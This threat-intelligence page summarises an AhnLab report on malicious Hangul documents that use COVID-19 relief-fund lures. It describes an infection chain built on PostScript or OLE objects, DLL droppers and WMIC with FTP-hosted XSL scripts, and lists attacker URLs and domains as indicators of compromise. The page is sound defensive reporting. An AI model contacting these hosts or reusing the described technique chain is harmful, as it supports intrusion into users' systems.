Shares tags: COVID-19, hwdoor • Same author: Ahnlab
‘코로나바이러스 피해 소상공인 경영안정자금’ 이름의 한글문서 유포
2020-12-15 • Ahnlab • Dissemination of a Korean document titled ‘Business stabilization fund for small business owners affected by coronavirus' •
AhnLab reported malicious Korean Hangul documents themed around COVID-19 small-business relief funds and procurement lures. The documents used malicious PostScript or embedded OLE objects to download or drop DLL payloads, including wscapi.dll and mss.dat. Those DLLs abused WMIC with FTP-hosted XSL scripts to run fileless code in memory, then created scheduled tasks and downloaded additional payloads. The campaign exploited public interest in pandemic-related government support, so users were advised not to open attachments from unclear sources.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| URL | ftp://u:[email protected]/gate/… | 2020-12-15 | 2020-12-15 |
| URL | ftp://d:[email protected]/des… | 2020-12-15 | 2020-12-15 |
| URL | http://g.smtper.cz/log/d/s.png | 2020-12-15 | 2020-12-15 |
| URL | http://otp.greenulz.com/assets/… | 2020-12-15 | 2020-12-15 |
| DOMAIN | g.smtper.cz | 2020-12-15 | 2020-12-15 |
| DOMAIN | otp.greenulz.com | 2020-12-15 | 2020-12-15 |
| DOMAIN | blog.greenulz.com | 2020-12-15 | 2020-12-15 |
| DOMAIN | green.smtper.cz | 2020-12-15 | 2020-12-15 |
Related Reports
2020-12-23 •
40% Match
#COVID-19
#Lazarus
#T1082
#T1059.003
#T1140
#T1041
#T1071.001
#T1132.001
#T1049
#T1070.006
#T1055.001
#T1021.002
#T1033
#T1569.002
#T1543.003
#T1547.005
#T1027.001
#T1003.002
Shares tag: COVID-19 • Published within a month
Shares tag: COVID-19 • Same author: Ahnlab
2021-10-28 •
30% Match
Malicious HWP File with COVID-19 Relief Fund Related ‘Collection of Personal Information Consent Form’
Ahnlab
Shares tag: COVID-19 • Same author: Ahnlab
Shares tag: COVID-19 • Same author: Ahnlab
Shares tag: COVID-19